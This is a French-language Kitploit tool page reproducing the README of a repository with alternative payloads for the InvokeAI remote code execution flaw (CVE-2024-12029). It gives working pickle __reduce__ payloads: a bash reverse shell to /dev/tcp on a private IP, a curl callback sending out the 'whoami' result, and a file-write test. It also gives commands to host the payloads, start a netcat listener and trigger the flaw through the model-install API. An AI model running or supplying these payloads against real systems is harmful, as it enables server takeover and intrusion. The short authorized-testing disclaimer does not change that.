Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Alternative-Approach-Reverse-Shell-Callback-Test-InvokeAI-RCE — Ce dépôt contient des approches alternatives de payload pour la vulnérabilité RCE d'InvokeAI (CVE-2024-12029) lorsque l'injection de clé SSH échoue. Les payloads sont conçus pour tester si la désérialisation pickle se produit réellement et fournir des méthodes d'accès alternatives. | Kitploit
Outils/GitHubGitHub/lu3ky13/alternative-approach-reverse-shell-callback-test-invokeai-rce
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleApprentissage et ÉducationOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHub
lu3ky13/alternative-approach-reverse-shell-callback-test-invokeai-rce

Alternative-Approach-Reverse-Shell-Callback-Test-InvokeAI-RCE

Voir le dépôt
3il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Ce dépôt contient des approches alternatives de payload pour la vulnérabilité RCE d'InvokeAI (CVE-2024-12029) lorsque l'injection de clé SSH échoue. Les payloads sont conçus pour tester si la désérialisation pickle se produit réellement et fournir des méthodes d'accès alternatives.

Partager

Alternative-Approach-Reverse-Shell-Callback-Test-InvokeAI-RCE

Approche alternative : test de reverse shell et de callback

Vue d'ensemble

Ce dépôt contient des approches alternatives de payload pour la vulnérabilité RCE d'InvokeAI (CVE-2024-12029) lorsque l'injection de clé SSH échoue. Les payloads sont conçus pour vérifier si la désérialisation pickle se produit réellement et fournir des méthodes d'accès alternatives.

Énoncé du problème

Lorsque les payloads d'injection de clé SSH sont livrés avec succès (statut 201) mais que l'accès SSH nécessite toujours un mot de passe, cela indique soit :

  1. La désérialisation pickle ne se produit pas
  2. Les commandes sont bloquées/sandboxées
  3. La méthode d'exécution est incompatible

Solution : Payloads alternatifs

📁 Fichiers de payload

Payloads de reverse shell
  • payload_reverse_bash.ckpt (89 octets) - Reverse shell Bash
  • payload_reverse_python.ckpt (267 octets) - Reverse shell Python
  • payload_reverse_nc.ckpt (70 octets) - Reverse shell Netcat

Payloads de test et de vérification

  • payload_callback_test.ckpt (115 octets) - Callback HTTP pour vérifier la désérialisation
  • payload_test.ckpt (90 octets) - Test simple de création de fichier
  • payload_alt_exec.ckpt (223 octets) - Méthode d'exécution alternative

Payloads SSH (pour référence)

  • payload_ssh_simple.ckpt (271 octets) - Injection de clé SSH compatible Linux

🛠️ Scripts de test

Scripts de test Kali

  • kali_reverse_test.py - Suite de tests complète

Générateurs de payload

  • reverse_shell_payload.py - Générer des payloads de reverse shell

🚀 Utilisation rapide

1. Démarrer le serveur de payload

root@kitploit:~
python web_server.py --port 8000

2. Tester le callback (recommandé en premier)

root@kitploit:~
# Copy kali_reverse_test.py to Kali and run:
python3 kali_reverse_test.py
# Choose option 1 to test callback

3. Tester le reverse shell

root@kitploit:~
# Start listener on Kali:
nc -lvnp 4444

# Send reverse shell payload:
python3 -c "import requests; requests.post('http://192.168.117.218:9090/api/v2/models/install', params={'source': 'http://192.168.45.168:8000/payload_reverse_bash.ckpt', 'inplace': 'true'}, json={})"

4. Tester l'exécution simple

root@kitploit:~
# Test basic command execution:
python3 -c "import requests; requests.post('http://192.168.117.218:9090/api/v2/models/install', params={'source': 'http://192.168.45.168:8000/payload_test.ckpt', 'inplace': 'true'}, json={})"

# Verify file creation:
ssh [email protected] 'cat /tmp/payload_test.txt'

📊 Interprétation des résultats de test

✅ Succès du test de callback

  • Ce que cela signifie : La désérialisation pickle fonctionne
  • Prochaine étape : Essayez un reverse shell ou des payloads SSH alternatifs
  • Vérification : journaux du serveur web pour le callback HTTP

✅ Succès du reverse shell

  • Ce que cela signifie : Les commandes s'exécutent et l'accès réseau fonctionne
  • Résultat : Accès shell direct via le listener netcat
  • Prochaine étape : Utilisez le reverse shell pour une exploitation plus poussée

✅ Fichier de test créé

  • Ce que cela signifie : L'exécution de commandes de base fonctionne
  • Prochaine étape : Essayez des méthodes alternatives d'injection SSH
  • Vérification : /tmp/payload_test.txt sur la cible

Payload de callback

root@kitploit:~
class CallbackTestPayload:
    def __reduce__(self):
        import os
        command = 'curl "http://192.168.45.168:8000/callback?success=1&user=$(whoami)"'
        return (os.system, (command,))

Payload de reverse shell

root@kitploit:~
class ReverseShellPayload:
    def __reduce__(self):
        import os
        command = f'bash -c "bash -i >& /dev/tcp/192.168.45.168/4444 0>&1"'
        return (os.system, (command,))

Payload de test

root@kitploit:~
class TestPayload:
    def __reduce__(self):
        import os
        return (os.system, ('echo "PAYLOAD_EXECUTED_$(date)" > /tmp/payload_test.txt',))

📚 Références

  • CVE-2024-12029 : Exécution de code à distance InvokeAI
  • Désérialisation non sécurisée de PyTorch : vulnérabilité torch.load()
  • Pickle reduce : exploitation de la sérialisation d'objets Python

⚠️ Avertissement

Ce dépôt est destiné uniquement à des fins éducatives et de tests de sécurité autorisés. Les utilisateurs sont responsables de s'assurer qu'ils disposent de l'autorisation appropriée avant de tester tout système.

Télécharger l’outil